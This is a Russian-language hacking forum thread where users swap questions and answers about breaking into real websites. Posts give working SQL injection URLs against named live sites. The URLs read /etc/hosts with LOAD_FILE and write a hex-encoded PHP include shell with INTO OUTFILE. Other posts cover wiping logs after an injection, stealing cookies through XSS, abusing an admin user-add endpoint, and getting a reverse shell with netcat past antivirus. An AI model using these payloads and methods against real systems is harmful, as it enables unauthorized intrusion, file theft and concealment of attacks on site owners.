Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    1 А как ты пишешь в файл, если там что-то экранируется?
    2 Прочитай индекс файл, или любой файл с веба. Уверен, что база там-же где сайт?
    Покажешь хоть один пример?
     
  2. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    Пример

    читаем /etc/hosts
    http://www.dimex.ru/cat.php?p=-1&c=13+UNION+SELECT+LOAD_FILE(0x2F6574632F686F737473),2

    в исходнике смортим он есть

    пишем <? phpinfo(); ?>

    http://www.dimex.ru/cat.php?p=-1&c=13+UNION+SELECT+0x3C3F20706870696E666F28293B203F3E,2+FROM+mysql.user+INTO+DUMPFILE+'/tmp/12345'

    читаем
    /tmp/12345

    http://www.dimex.ru/cat.php?p=-1&c=13+UNION+SELECT+LOAD_FILE(0x2F746D702F3132333435),2

    и ниче (
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Rubaka
    Там квотесы включены, с чего он запишется-то?
     
  4. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    jokester
    ну так файл же читается, и не записывается
    как я и говорил
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    вот что ты говорил.

    Вот и покажи мне пример, где у юзера такие ПРАВА, что читать он может, а писать нет.
    Кавычки тут никакого отношения к делу не имеют
     
    1 person likes this.
  6. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    jokester
    да неправ я был ,ступил
    везде где нет кавычек и права для чтения я в /tmp могу писать
    сайтов 5-6 попробовал
     
    2 people like this.
  7. crazy~driver

    crazy~driver Member

    Joined:
    21 Dec 2008
    Messages:
    97
    Likes Received:
    14
    Reputations:
    4
    подскажите есть ли здесь скуль иньекция
    www.craigolsonsports.com/newsarticle.php?id=0809&nid=29546'
     
  8. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Code:
    http://www.craigolsonsports.com/newsarticle.php?id=0809&nid=29546%20and%201=2%20union%20select%20user(),2+--+
     
    1 person likes this.
  9. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    1. -deleted-

    2. Уже читал, пароли к БД вытащил, только с других хостов не пускает (как и положено)


    L I G A, Уже пробывал - всё равно не работает :(

    Ошибку пишет
    Да что за срань такая!

    Ведь если файлы читаются, значит для пользователя установлен флаг file_priv=y, значит и писать можно! Всё, по-другому никак. Или я не прав?

    А запрос может быть составлен так, чтобы конструкции into outfile и into dumpfile нельзя было использовать?
     
    #9569 _gr34t, 28 Oct 2009
    Last edited: 28 Oct 2009
  10. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Code:
    http://site.com/calendar.php?event_id=681+union+select+null,0x3c3f 70687020696e636c75646528245f4745545b67675f696e635d 293b3f3e,null,null,null+into+outfile+0x2f706174682 f746f2f6d792f7363726970742e706870
    ну может потому и не пишется что ты путь в hex'е вписал))
     
    1 person likes this.
  11. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    Блиа. :(
    ILYAtirtir, спасибо что разморочил. )

    Отвечаю, что где-то на ачате видел такое. В памяти отложилось вот и писал так. Оказывается так нельзя )

    Тогда другой вопрос: можно как-нибудь обойти кавычки?
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    нет, только если есть двойной запрос в скуле
     
  13. SpYeR

    SpYeR New Member

    Joined:
    11 Nov 2007
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    Можно ли получить куки поддомена (test.site.ru) если есть xss в основном домене(site.ru)?
     
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Нельзя.
     
    2 people like this.
  15. Op3r

    Op3r New Member

    Joined:
    10 Dec 2007
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    как после удачной SQL inj. чистить логи?
    версия MySQL 5.1.22-rc-log
    где их искать?
     
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Обычно:
    /var/log/mysql
     
  17. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Разве их кто то логирует? чистить нужн access логи....а не мускульные.
     
  18. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Привет, наткнулся на сайт который на 80% написан на JS с использованием Аякса
    Почитам код наткнулся на функцию которая добавляет юзера

    PHP:
    function user_add2db()
    {
        if ((
    true) || (assertNotEmpty('adminUserAdd_login''Логин не может быть пустым!')
               && 
    assertNotEmpty('adminUserAdd_password1''Пароль не может быть пустым!')
               && 
    assertNotEmpty('adminUserAdd_name''Имя пользователя не может быть пустым!')
               && 
    assertEqual('adminUserAdd_password1''adminUserAdd_password2''Пароль и его подтверждение не совпадают!')))
        {
            new 
    Ajax.Updater('notify'siteGetUrl()+'core/user_add2db', {evalScriptstrue,
                
    parameters: {
                
    id: -1,
                    
    login: $('adminUserAdd_login').value,
                    
    name: $('adminUserAdd_name').value,
                    
    password: $('adminUserAdd_password1').value,
                    
    email: $('adminUserAdd_email').value,
                    
    group: $('adminUserAdd_group').value,
                    
    description: $('adminUserAdd_descr').value } });
        }
    }
    Обратился к site.ru/core/user_add2db не передав параметров
    PHP:
    NoticeUndefined indexid in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 153

    Notice
    Undefined indexlogin in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 153

    Notice
    Undefined indexname in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 153

    Notice
    Undefined indexdescription in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 154

    Notice
    Undefined indexemail in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 154

    Notice
    Undefined indexgroup in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 154

    Notice
    Undefined indexpassword in /opt/htdocs/kid/site.ru/ui/admin/users.inc.php on line 156

    Fatal error
    Call to a member function sid() on a non-object in /opt/htdocs/kid/site.ru/core/user.class.php on line 50
    Вопрос в том как передать странице параметры (через GET не получается)
     
  19. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    еслиб register_globals=On оно бы передалось в любом случае..а значит никак.
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Значит так:
    1. Есть шелл на сервере.
    2. Есть NetCat у меня.
    По всей видимости на сервере стоит антивирь, т.к. при бек-коннекте с помощью встроенной ф-ции в r57 ничего не происходит. Брал так же другой скрипт для бек-коннект - ничего... Как сделать бек-коннект?
     
Thread Status:
Not open for further replies.